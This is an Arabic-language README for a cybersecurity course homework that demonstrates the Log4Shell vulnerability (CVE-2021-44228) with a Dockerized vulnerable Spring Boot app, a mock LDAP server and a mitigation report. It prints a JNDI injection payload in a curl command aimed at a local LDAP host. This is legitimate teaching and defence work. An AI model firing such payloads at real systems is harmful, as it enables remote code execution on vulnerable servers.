
Log4Shell (CVE-2021-44228) إيضاح استغلال لـ SEAS 8405. يتضمن تطبيق Spring Boot ضعيف، وخادم LDAP وهمي، وإعداد Docker، وتعيين MITRE، واستجابة للحوادث، وتسجيل شاشة كامل.
يوضح هذا المشروع استغلال وتخفيف ثغرة Log4Shell (CVE-2021-44228) باستخدام تطبيق ويب جافا تم حوسبته (Dockerized) مع Log4j 2.14.1 القابل للاستغلال. تشمل الإعدادات أيضًا خادم LDAP ضارًا محاكيًا لإظهار مسار هجوم حقن JNDI.
بعد الاستغلال، يتم تعزيز النظام من خلال ترقية Log4j، والتحقق من صحة المدخلات، وتطبيق توصيات MITRE D3FEND و ATT&CK.
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
docker build -t vulnerable-app .
docker-compose up
سيعمل التطبيق على:
http://localhost:8080
python3 ldap_server.py
أرسل طلبًا كهذا إلى التطبيق:
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}
يجب أن يتلقى خادم LDAP الطلب (وهذا يحاكي استغلال JNDI).
بعد عرض الهجوم، تم تأمين النظام من خلال:
${jndi:...})انظر mitigation_report.pdf لـ:
إذا لم يتم رفع الفيديو مباشرة، فهو متاح عبر الرابط الموجود في التقرير.
Serpil Rivas
SEAS 8405 – معماريات الأمن السيبراني
مايو 2025